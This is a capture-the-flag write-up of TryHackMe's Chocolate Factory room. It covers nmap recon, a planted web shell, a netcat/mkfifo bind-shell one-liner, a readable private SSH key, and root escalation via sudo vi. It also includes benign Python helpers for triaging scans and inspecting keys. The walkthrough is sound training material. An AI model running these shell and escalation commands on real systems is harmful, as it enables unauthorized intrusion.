Chocolate Factory CTF Writeup

Substing
Oct 5, 2023


This documents my adventures in TryHackMe's Chocolate Factory room.

There are a few different ways to approach this room. I am only documenting one of them.

Phase 1: recon

The first step I took was running nmap to enumerate ports and services: a plain port scan first, then a version scan (-sV) against the open ports, which is where the fingerprint-strings output below comes from.

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
100/tcp open newacct
101/tcp open hostname
102/tcp open iso-tsap
103/tcp open gppitnp
104/tcp open acr-nema
105/tcp open csnet-ns
106/tcp open pop3pw
107/tcp open rtelnet
108/tcp open snagas
109/tcp open pop2
110/tcp open pop3
111/tcp open rpcbind
112/tcp open mcidas
113/tcp open ident
114/tcp open audionews
115/tcp open sftp
116/tcp open ansanotify
117/tcp open uucp-path
118/tcp open sqlserv
119/tcp open nntp
120/tcp open cfdptkt
121/tcp open erpc
122/tcp open smakynet
123/tcp open ntp
124/tcp open ansatrader
125/tcp open locus-map
MAC Address: 02:98:7F:CD:DA:A5 (Unknown)

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-rw-r-- 1 1000 1000 208838 Sep 30 2020 gum_room.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.227.151
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1631bbb51fcccc12148ff0d833b0089b (RSA)
| 256 e71fc9db3eaa44b672103ceedb1d3390 (ECDSA)
|_ 256 b44502b6248ea9065f6c79448a06555e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
100/tcp open newacct?
| fingerprint-strings:
| Help, TerminalServer:
| "Welcome to chocolate room!!
| ___.-----------------.
| .'__'__'__'__'__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \'__'__'__'__'_`.__| `. \x20 ___ \r
| \'__'__'__\x20__'_;-----------------`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus"
106/tcp open pop3pw?
| fingerprint-strings:
| LDAPSearchReq, RPCCheck:
| "Welcome to chocolate room!!
| ___.-----------------.
| .'__'__'__'__'__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \'__'__'__'__'_`.__| `. \x20 ___ \r
| \'__'__'__\x20__'_;-----------------`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus"
109/tcp open pop2?
| fingerprint-strings:
| RTSPRequest, TerminalServer:
| "Welcome to chocolate room!!
| ___.-----------------.
| .'__'__'__'__'__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \'__'__'__'__'_`.__| `. \x20 ___ \r
| \'__'__'__\x20__'_;-----------------`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus"
110/tcp open pop3?
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions:
| "Welcome to chocolate room!!
| ___.-----------------.
| .'__'__'__'__'__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \'__'__'__'__'_`.__| `. \x20 ___ \r
| \'__'__'__\x20__'_;-----------------`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus"
111/tcp open rpcbind?
| fingerprint-strings:
| Help, X11Probe:
| "Welcome to chocolate room!!
| ___.-----------------.
| .'__'__'__'__'__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \'__'__'__'__'_`.__| `. \x20 ___ \r
| \'__'__'__\x20__'_;-----------------`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus"
113/tcp open ident?
| fingerprint-strings:
| HTTPOptions, NotesRPC:
|_ http://localhost/key_rev_key <- You will find the key here!!!
119/tcp open nntp?
| fingerprint-strings:
| HTTPOptions, LDAPSearchReq:
| "Welcome to chocolate room!!
| ___.-----------------.
| .'__'__'__'__'__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \'__'__'__'__'_`.__| `. \x20 ___ \r
| \'__'__'__\x20__'_;-----------------`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus"
125/tcp open locus-map?
| fingerprint-strings:
| GenericLines, NULL:
| "Welcome to chocolate room!!
| ___.-----------------.
| .'__'__'__'__'__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \'__'__'__'__'_`.__| `. \x20 ___ \r
| \'__'__'__\x20__'_;-----------------`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus"

Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 12.95 ms ip-10-10-26-141.eu-west-1.compute.internal (10.10.26.141)

This was a monstrous amount of output, but I quickly narrowed it down to a few ports, since almost every port from 100 through 125 returns the same decoy banner telling me to look elsewhere.

The ports worth investigating:

  • 21: FTP with anonymous login
  • 22: SSH
  • 80: HTTP. Web servers almost always hold useful information
  • 113: The message from the port scan told me I’ll find a key here. Seems important.
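To make that triage repeatable on a host that answers most ports with the same decoy text, here is an added example (my own code, not part of the original writeup) that parses the text output of nmap -sV, groups ports by the banner captured under fingerprint-strings, and lists the ports whose answer differs from the most common one. The scan text embedded in it is a constructed, trimmed excerpt of the scan above written in nmap's real indentation (probe names indented by 3, payload lines by 4 or 5); the function names are mine.

```python
import re
from collections import defaultdict

# Constructed, trimmed excerpt of the version scan above in nmap's real layout.
# Not the full scan output.
SAMPLE_NMAP = """\
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.3
22/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu))
100/tcp open  newacct?
| fingerprint-strings:
|   Help, TerminalServer:
|     "Welcome to chocolate room!!
|     small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_    hope you wont drown Augustus"
106/tcp open  pop3pw?
| fingerprint-strings:
|   LDAPSearchReq, RPCCheck:
|     "Welcome to chocolate room!!
|     small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_    hope you wont drown Augustus"
113/tcp open  ident?
| fingerprint-strings:
|   HTTPOptions, NotesRPC:
|_    http://localhost/key_rev_key <- You will find the key here!!!
119/tcp open  nntp?
| fingerprint-strings:
|   HTTPOptions, LDAPSearchReq:
|     "Welcome to chocolate room!!
|     small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_    hope you wont drown Augustus"
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def _split(line):
    """Return (indent, text) for a `| ...` or `|_...` NSE output line."""
    rest = line[1:]
    if rest.startswith("_"):
        rest = rest[1:]
    return len(rest) - len(rest.lstrip(" ")), rest.strip()


def parse_nmap(text):
    """Map port -> {service, version, banner} from `nmap -sV` text output.

    `banner` is the fingerprint-strings payload with nmap's probe-name lines
    ("Help, TerminalServer:") dropped, so identical banners compare equal
    no matter which probe triggered them."""
    ports, current, in_fp = {}, None, False
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = ports[int(m.group(1))] = {
                "service": m.group(4), "version": m.group(5).strip(), "banner": []}
            in_fp = False
            continue
        if current is None or not line.startswith("|"):
            continue
        indent, body = _split(line)
        if indent <= 1:                       # a new NSE script block starts here
            in_fp = body.startswith("fingerprint-strings:")
        elif in_fp and indent >= 4:           # indent 2-3 = probe names, 4+ = payload
            current["banner"].append(body)
    for info in ports.values():
        info["banner"] = "\n".join(info["banner"])
    return ports


def odd_ones_out(ports):
    """Return the ports whose banner (or version string) is not the most common one.

    The biggest group is the decoy noise; everything else deserves a manual look."""
    groups = defaultdict(list)
    for port, info in ports.items():
        groups[info["banner"] or info["version"]].append(port)
    decoy = max(groups, key=lambda k: len(groups[k]))
    return sorted(p for k, ps in groups.items() if k != decoy for p in ps)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP
    scan = parse_nmap(text)
    for port in odd_ones_out(scan):
        print(port, scan[port]["service"], scan[port]["version"] or scan[port]["banner"])
```

Run it with a saved nmap -sV output file as the argument, or with no argument to use the embedded excerpt; on that excerpt it reports 21, 22, 80 and 113, which is exactly the short list above.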

Port 113: ident

Whatever is listening on 113 is not really ident; it just returns a banner, and that banner points at a specific file on the HTTP server. Since "localhost" means the target itself, the file is at http://<target>/key_rev_key on port 80.

113/tcp open ident?
| fingerprint-strings:
| HTTPOptions, NotesRPC:
|_ http://localhost/key_rev_key <- You will find the key here!!!

[screenshot: accessing key_rev_key]

Looking at the downloaded file, it is an executable rather than a text file.

Using the most efficient (laziest) reverse engineering technique, I found the hidden key. What is this for? You will find out later...
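The laziest technique is pulling the printable strings out of the binary and grepping them, which only works because the key is stored in cleartext. As an added example (my own code, not the writeup's and not the room's binary), here is a small strings(1) clone with a case-insensitive filter; the byte blob it runs on is constructed for the demo and the key in it is a placeholder.

```python
import re
import sys

# Constructed stand-in for the key_rev_key binary: a few readable strings, one of
# them a placeholder key, surrounded by non-printable bytes. Not the real file.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00"
    b"Enter your key: \x00"
    b"\x00\x01\x02\x03"
    b"congratulations! you have found the key: \x00"
    b"\x90\x90"
    b"FAKE-KEY-0000\x00"
    b"\xff\xfe"
    b"/lib64/ld-linux-x86-64.so.2\x00"
    b"a\x00b\x00"
)


def strings(data, min_len=4):
    """Return printable ASCII runs of at least min_len bytes, like strings(1)."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def grep_strings(data, needle, min_len=4):
    """strings | grep -i: keep only the strings that mention `needle`."""
    needle = needle.lower()
    return [s for s in strings(data, min_len) if needle in s.lower()]


if __name__ == "__main__":
    # Usage: python strings_demo.py <binary> [needle]; no arguments runs the sample.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BINARY
    for s in grep_strings(blob, sys.argv[2] if len(sys.argv) > 2 else "key"):
        print(s)
```

The limitation is the same as for the real strings tool: it only finds secrets that exist as contiguous ASCII in the file. If the key were XOR-ed, built byte by byte at runtime, or stored as UTF-16, you would need ltrace, a debugger, or a disassembler instead.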

Port 80: HTTP

[screenshot: web page]

The webpage shows a login panel. When I attempted a login, I saw that it directed me to a .php page.

[screenshot: validation page running php]

The next step I took was to enumerate any other pages that might be hosted on the server, specifically looking for other php or html pages.

[screenshot: gobuster helps find pages]

The screenshot was taken while gobuster was still running, but nothing further turned up after it finished. The one result that mattered was home.php.

[screenshot: home.php hosts a webshell]

What a discovery! This allows system commands to be run right in the browser.

Phase 2: access

The web shell gives remote code execution on the box, making my job a lot easier.

In the web shell I ran the following to open a bind shell on port 9001:

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 0.0.0.0 9001 > /tmp/f

The named pipe /tmp/f is what makes this work with a netcat that lacks the -e option: whatever nc receives is written into the pipe, cat feeds it to an interactive /bin/sh, and the shell's stdout and stderr are piped back out through nc. Because this is a bind shell the target does the listening, so it only works when nothing between my machine and the target filters inbound connections to 9001; I connect with nc, the target's IP and 9001, and a reverse shell from the same site is the fallback if the port is filtered. The listener is unauthenticated and in plaintext, so anyone who can reach the port gets the same shell.

Credit for the one-liner goes to https://www.revshells.com/.

[screenshot: opening a bind shell]
[screenshot: connecting to the bind shell]

And with that, I had gotten onto the system.

Phase 3: escalation

In this case, escalation happened in a few steps.

Lateral movement: www-data to charlie

The first of these started by poking around the machine as www-data.

In /home/charlie there was a file called teleport containing Charlie's private SSH key, and it was readable by www-data. That is the actual misconfiguration: a private key is only as secret as the permissions on the file that holds it.

[screenshot: ssh private key]

With a private SSH key, I opened a session as user charlie over SSH. Two benefits come from this.

  1. I gain access to a user account, which generally has more privileges than www-data.
  2. SSH is a stable shell with autocomplete and arrow keys built in. No need to stabilize the shell manually.

[screenshot: logging in to charlie]
[screenshot: looking at account privileges]

I’m in.
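Before trying a key found like this, it is worth checking whether it is even usable without a passphrase. The following is an added example of mine, not code from the writeup or the room, that reads the header of a private key file and reports its format and whether it is encrypted: for the openssh-key-v1 container it decodes the ciphername and kdfname fields, for legacy PEM it looks for the Proc-Type header, and for PKCS#8 it checks the BEGIN label. The build_openssh_key helper fabricates a structurally valid but useless key file so the example runs offline; all function names are mine.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(b):
    """Encode an SSH wire-format string: uint32 big-endian length + bytes."""
    return struct.pack(">I", len(b)) + b


def build_openssh_key(cipher=b"none", kdf=b"none"):
    """Constructed, structurally valid openssh-key-v1 file for this demo only.

    The key material is zero padding, so it cannot authenticate anywhere;
    only the header fields that reveal encryption are meaningful."""
    blob = (OPENSSH_MAGIC
            + _ssh_string(cipher)                   # ciphername ("none" = unencrypted)
            + _ssh_string(kdf)                      # kdfname ("bcrypt" when a passphrase is set)
            + _ssh_string(b"")                      # kdfoptions
            + struct.pack(">I", 1)                  # number of keys
            + _ssh_string(b"\x00" * 32)             # public key placeholder
            + _ssh_string(b"\x00" * 64))            # (possibly encrypted) private section
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


def inspect_private_key(text):
    """Report what a found private key file is and whether it needs a passphrase."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM-style private key")
    label = lines[0][len("-----BEGIN "):].rstrip("-")
    body = lines[1:-1]
    if label == "OPENSSH PRIVATE KEY":
        raw = base64.b64decode("".join(body))
        if not raw.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        fields = []
        for _ in range(2):                      # ciphername, then kdfname
            (n,) = struct.unpack(">I", raw[off:off + 4])
            fields.append(raw[off + 4:off + 4 + n].decode())
            off += 4 + n
        cipher, kdf = fields
        return {"format": "openssh-key-v1", "label": label, "cipher": cipher,
                "kdf": kdf, "encrypted": cipher != "none"}
    # Legacy PEM (RSA/DSA/EC PRIVATE KEY) marks passphrase protection with a
    # Proc-Type header; PKCS#8 uses a distinct "ENCRYPTED PRIVATE KEY" label.
    encrypted = (label == "ENCRYPTED PRIVATE KEY"
                 or any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in body))
    return {"format": "pem", "label": label, "cipher": None, "kdf": None, "encrypted": encrypted}


def mode_is_private(st_mode):
    """True when no group/other permission bits are set on os.stat(path).st_mode.

    ssh refuses a key file that fails this check ("UNPROTECTED PRIVATE KEY FILE")."""
    return st_mode & 0o077 == 0
```

The login itself is ssh -i teleport charlie@<target>. A key copied off the box usually arrives world-readable, which ssh rejects, so chmod 600 it first; mode_is_private is the same check applied to an os.stat result. If inspect_private_key reports encrypted, the key is still worth keeping, but it becomes a cracking job rather than an immediate login.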

Getting root

I first checked what charlie could run as root without a password (sudo -l), and lucky me: vi was allowed with NOPASSWD.

Thanks to some help from GTFOBins, I was quickly able to spawn a root shell. The GTFOBins sudo entry for vi does it by running a shell from inside the editor, for example sudo vi -c ':!/bin/sh' /dev/null. Any editor that can run shell commands is a root shell when it runs as root, which is why editors have no business in a NOPASSWD sudo rule.

That's the box... right? Not quite. In order to read the root flag, I had to use that key from earlier.

In the /root directory there is no text file, but rather a Python script. It asks for a key; when prompted, the key recovered from key_rev_key prints the flag.

I am now the owner of Chocolate Factory
